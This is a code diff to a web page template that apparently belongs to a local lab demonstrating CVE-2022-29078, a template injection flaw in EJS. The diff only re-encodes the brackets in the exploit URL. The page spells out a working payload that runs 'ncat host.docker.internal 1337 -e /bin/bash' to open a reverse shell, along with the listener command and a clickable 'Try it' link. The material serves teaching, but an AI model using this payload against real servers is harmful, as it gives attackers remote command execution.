--- a/views/pages/index.ejs
+++ b/views/pages/index.ejs
@@ -47,11 +47,11 @@
           <p>Now the idea is to exploit CVE-2022-29078 to create a remote shell, by executing the following command in the container<br/>
           <code>ncat host.docker.internal 1337 -e /bin/bash</code></p>
           <p>So we will use this url : <br/>
-            <code>http://localhost:3000/?id=David&settings[view%20options][outputFunctionName]=x;process.mainModule.require(%27child_process%27).execSync(%27ncat%20host.docker.internal%201337%20-e%20/bin/bash%27);s</code></p>
+            <code>http://localhost:3000/?id=David&settings%5Bview%20options%5D%5BoutputFunctionName%5D=x;process.mainModule.require(%27child_process%27).execSync(%27ncat%20host.docker.internal%201337%20-e%20/bin/bash%27);s</code></p>
           <p>And before activating the exploit server side, you just need to listen for an incoming connection
                         <code>nc -l 1337</code></p>
           </p>
-            <p><a href="/?id=David&settings[view%20options][outputFunctionName]=x;process.mainModule.require(%27child_process%27).execSync(%27ncat%20host.docker.internal%201337%20-e%20/bin/bash%27);s">Try it ! </a></p>
+            <p><a href="/?id=David&settings%5Bview%20options%5D%5BoutputFunctionName%5D=x;process.mainModule.require(%27child_process%27).execSync(%27ncat%20host.docker.internal%201337%20-e%20/bin/bash%27);s">Try it ! </a></p>
           </div>
       </div>
     </div>
